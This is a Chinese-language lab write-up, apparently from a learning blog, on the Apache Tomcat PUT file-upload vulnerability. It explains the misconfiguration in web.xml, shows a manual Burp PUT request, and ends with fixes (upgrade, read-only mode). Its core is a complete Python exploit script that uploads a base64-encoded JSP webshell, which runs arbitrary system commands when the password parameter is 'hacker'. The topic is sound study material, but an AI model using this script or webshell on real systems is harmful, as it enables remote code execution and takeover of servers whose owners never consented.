Tomcat put 上传漏洞
注:今后继续定期更新---“实战”!
Step1:环境搭建
环境搭建这部分略过,今后所有的环境我都会放到公网,感兴趣的朋友可以直接玩。
新环境
这里是三个漏洞 Tomcat 弱口令 、 Tomcat put 上传 、ElasticSearch 命令执行;
Step2:Tomcat put 上传漏洞
- 首先,点击传送门进入漏洞地址
http://xxx.xxx.xxx.xxx/
image.png
- 漏洞形成原因
Tomcat 配置文件
/tomcat/conf/web.xml中有这么一条注释:
web.xml
Tomcat 默认不开启put 请求&Delete 请求,当在下面这个位置开启后此漏洞即可利用:允许put&delete请求
- 漏洞利用
刷新页面,burp抓包将GET请求改为PUT请求,并填写要写入的内容;
如图所示:
插入文件ibug.txt
状态201表示写入成功:
image.png
编写exp脚本上传webshell(初学python,大佬勿喷):
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:iChina
#date:2019.3.3
#cHdkPWhhY2tlciZjbWQ9bHM=
#
import argparse
import requests
import base64
parser = argparse.ArgumentParser(description="tomcat_put.py -u target -p port -s webshell.jsp")
parser.add_argument('-u','--target',metavar="",help="The target site or ip")
parser.add_argument('-p','--port',metavar="",default="18080",help="Destination port")
parser.add_argument('-s','--Webshell',metavar="",default="jsp_config.jsp",help="The file name")
args = parser.parse_args()
url = args.target
port = args.port
webshell = args.Webshell
def payload(url,port,webshell):
urls = url + ":" + port + "/" + webshell + "/"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"zh-CN,zh;q=0.9"
}
payload = '''PCVAIHBhZ2UgbGFuZ3VhZ2U9ImphdmEiIGNvbnRlbnRUeXBlPSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9R0JLIgogICAgcGFnZUVuY29kaW5nPSJVVEYtOCIlPgogICAgICAgIDwlCiAgICAgICAgaWYgKCJoYWNrZXIiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKSB7CiAgICAgICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW5wdXQgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSkuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICAgICAgaW50IGxlbiA9IC0xOwogICAgICAgICAgICBieXRlW10gYnl0ZXMgPSBuZXcgYnl0ZVs0MDkyXTsKICAgICAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgICAgICB3aGlsZSAoKGxlbiA9IGlucHV0LnJlYWQoYnl0ZXMpKSAhPSAtMSkgewogICAgICAgICAgICAgICAgb3V0LnByaW50bG4obmV3IFN0cmluZyhieXRlcywgIkdCSyIpKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgICAgIH0KICAgICU+Cg=='''
data = base64.b64decode(payload)
response = requests.put(urls,data,headers=headers)
code = response.status_code
if code==201:
shell = url + ":" + port + "/" + webshell
print shell
elif code==204:
print 'File already exists'
else:
print 'unsuccessful'
def main():
payload(url,port,webshell)
if __name__ == '__main__':
main()
成功getshell:
getshell
image.png
Step3:修复建议
1.升级到Apache Tomcat更高版本
2.开启只读模式,修改配置文件/tomcat/conf/web.xml 如下图:
image.png
END
由于小编也在学习中,写的不好请见谅。
从0到1学习网络安全 【目录】实战环境地址群内公布!!!
白帽交流群 【简介】
感谢大家支持。
网友评论